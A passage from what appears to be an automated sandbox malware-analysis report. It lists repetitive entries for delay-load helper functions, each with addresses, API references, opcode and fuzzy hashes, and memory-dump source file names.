                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: 2d595bd938cb469e04593f5521cac4af096207dbad5942efd8e9afe587af2ccd
                                                          • Instruction ID: 5a50d90f28c6f68e62041229de988d3212bcbd8d5686c2599bcea97321cc1025
                                                          • Opcode Fuzzy Hash: 2d595bd938cb469e04593f5521cac4af096207dbad5942efd8e9afe587af2ccd
                                                          • Instruction Fuzzy Hash: A3B012D2359282BC304852065F03F37111CD3C1B20334812EFC05C41C0D844BD453872
                                                          Function 00FCE44B Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE3FC
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: 698c5580fa4e2c8a3e1ca7c4d6f47e32568d33a385e4088ddca89dd37402a2e2
                                                          • Instruction ID: eb2bb59a7c0abe03951563e0d5fdc65d51081ca7aabaf0a45f8cff4147385e1f
                                                          • Opcode Fuzzy Hash: 698c5580fa4e2c8a3e1ca7c4d6f47e32568d33a385e4088ddca89dd37402a2e2
                                                          • Instruction Fuzzy Hash: 06B012E22590C2BC310491055E03F37124DD2C0B20330C11EF808C50C0D8449C053873
                                                          Function 00FCE423 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE3FC
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: 82cba1bafccf968818103dae744c5fa77d938efd3feab145f406bc62fc721162
                                                          • Instruction ID: 77ba90718ffbfece44ed9ca26a8a3453e5d726dd31aa1e04e548d19f0486e055
                                                          • Opcode Fuzzy Hash: 82cba1bafccf968818103dae744c5fa77d938efd3feab145f406bc62fc721162
                                                          • Instruction Fuzzy Hash: 90B012F22590C2BC310491055E03F37128DD1C0F20330801EF808C50C0D8489D013473
                                                          Function 00FCE419 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE3FC
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: d32d7f667efa6b853122270a2782d4c44f48236f13edbffc56284a0d3bf444ea
                                                          • Instruction ID: 696729211e260aa2d4dbf1d7d41486416db2e5cf7ba1f05f3ee68be853caaadc
                                                          • Opcode Fuzzy Hash: d32d7f667efa6b853122270a2782d4c44f48236f13edbffc56284a0d3bf444ea
                                                          • Instruction Fuzzy Hash: CCB012E23590C27C310451055F03F77124DD2C0B20331C01EF508D50C0D8445C0A3873
                                                          Function 00FCE5B1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE580
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: 824f6c92600eface529be1126cc110861367132adeec3862b5d87eb4ab7088de
                                                          • Instruction ID: f4b212a0afd90f209ee22b1425d645ee94e71a7f3267f7031def28c2dcb717c8
                                                          • Opcode Fuzzy Hash: 824f6c92600eface529be1126cc110861367132adeec3862b5d87eb4ab7088de
                                                          • Instruction Fuzzy Hash: EEB012C36691427C304451559E03F37212CD1C0B20334461EF808C50C0E8484C513572
                                                          Function 00FCE5A7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE580
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: 27af892386ccfb7831de7ca6ea22fbf658f2b92dfa551c057ca798360584c063
                                                          • Instruction ID: 784859ba1487d3c90ca0b586fa5e132422ad93df1c949cafe03bc499accab792
                                                          • Opcode Fuzzy Hash: 27af892386ccfb7831de7ca6ea22fbf658f2b92dfa551c057ca798360584c063
                                                          • Instruction Fuzzy Hash: 56B012C36A90427C300451559F03F37212CD1C0B20334461EF408C50C0EC484C123572
                                                          Function 00FCE593 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE580
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: 7c0dd1d5f190e0cd313942718c3471b83ed2762b83c567e40bad8b6dcb177dda
                                                          • Instruction ID: f904d780cd2c0db141a68ef173852d65e8c51d115e931549bf1e1bf19e9c6e24
                                                          • Opcode Fuzzy Hash: 7c0dd1d5f190e0cd313942718c3471b83ed2762b83c567e40bad8b6dcb177dda
                                                          • Instruction Fuzzy Hash: 97B012C36690427D300451555E03F37111CE1C0B20330441EF408C50C0E8484C113572
                                                          Function 00FCE546 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE51F
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: 433a3a298aaf3f18e91df2fc87c8cd377e2fcf45c04e601f601fbf51af0bc887
                                                          • Instruction ID: 2f9abc4025442bc0a7da31ac7759c65071cb48ae930002c137e15f8b11fad761
                                                          • Opcode Fuzzy Hash: 433a3a298aaf3f18e91df2fc87c8cd377e2fcf45c04e601f601fbf51af0bc887
                                                          • Instruction Fuzzy Hash: 7EB012C26592427C310452099E03F3B254CD1C1F20330461EF488C40C4E8445C453872
                                                          Function 00FCE532 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE51F
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: 0855923f8d4b796fa9d8ac89e8e9b477b82654c7451b134749eb204b23b16fe7
                                                          • Instruction ID: ce1dec96cf585f7a2c71ca6868537a2f353069ef4f3c10153112af576724a5b2
                                                          • Opcode Fuzzy Hash: 0855923f8d4b796fa9d8ac89e8e9b477b82654c7451b134749eb204b23b16fe7
                                                          • Instruction Fuzzy Hash: E8B012C2A591427D300492095E03F3B114CE1C1F20330441EF448C40C4E8444C013872
                                                          Function 00FCE528 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE51F
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: af44ee74e2b08a73cb0e14128adc7d97687ea17bab2fa1b512e0ff8112deeda9
                                                          • Instruction ID: 42271c6e30e01fbbd073573dd548029cb65648168360dcd0041f3802078372c4
                                                          • Opcode Fuzzy Hash: af44ee74e2b08a73cb0e14128adc7d97687ea17bab2fa1b512e0ff8112deeda9
                                                          • Instruction Fuzzy Hash: B4B012C2A591827C300452095F03F3B154CD1C1F20330841EF448C40C4E8444C023872
                                                          Function 00FCE50D Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE51F
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: ac132c50e2f38caf9024064237ef1a9323e760519129942dbca70aff3d309cde
                                                          • Instruction ID: 84d5a068774daa2b7fc6f56faf1404557690a3f98f9ac609334d03580b0851cd
                                                          • Opcode Fuzzy Hash: ac132c50e2f38caf9024064237ef1a9323e760519129942dbca70aff3d309cde
                                                          • Instruction Fuzzy Hash: 57B012C26591427C300452255E07F3B110CE1C1F24330442EF498C44C6E8444C053872
                                                          Function 00FCE2D7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE1E3
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: 9a5b7411abfab761456765c4266c72f373e34ca3950af1b8832858c084b66f18
                                                          • Instruction ID: 92d0973d3095b3fda58499676b75ae74f401827ce42782a297b193a151b52ff8
                                                          • Opcode Fuzzy Hash: 9a5b7411abfab761456765c4266c72f373e34ca3950af1b8832858c084b66f18
                                                          • Instruction Fuzzy Hash: 82A002D6559143BC310951525F07E37111DC5C5B51334452DF816C44C1585479553871
                                                          Function 00FCE2CD Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE1E3
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: a511e136b46ef5a2c63e8b378adbdf38799656e6330a2892299f7f7287ac9414
                                                          • Instruction ID: 92d0973d3095b3fda58499676b75ae74f401827ce42782a297b193a151b52ff8
                                                          • Opcode Fuzzy Hash: a511e136b46ef5a2c63e8b378adbdf38799656e6330a2892299f7f7287ac9414
                                                          • Instruction Fuzzy Hash: 82A002D6559143BC310951525F07E37111DC5C5B51334452DF816C44C1585479553871
                                                          Function 00FCE2C3 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE1E3
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: b6a150ca4b36d1aaf865c312287606263b86e68e9fa3e0d9d47bfba852c672fa
                                                          • Instruction ID: 92d0973d3095b3fda58499676b75ae74f401827ce42782a297b193a151b52ff8
                                                          • Opcode Fuzzy Hash: b6a150ca4b36d1aaf865c312287606263b86e68e9fa3e0d9d47bfba852c672fa
                                                          • Instruction Fuzzy Hash: 82A002D6559143BC310951525F07E37111DC5C5B51334452DF816C44C1585479553871
                                                          Function 00FCE2B9 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE1E3
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: eb4ef26f697e03541fd450d90f7c16a9ec904731510009fe55cefd9fc0a4f47f
                                                          • Instruction ID: 92d0973d3095b3fda58499676b75ae74f401827ce42782a297b193a151b52ff8
                                                          • Opcode Fuzzy Hash: eb4ef26f697e03541fd450d90f7c16a9ec904731510009fe55cefd9fc0a4f47f
                                                          • Instruction Fuzzy Hash: 82A002D6559143BC310951525F07E37111DC5C5B51334452DF816C44C1585479553871
                                                          Function 00FCE2AF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE1E3
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
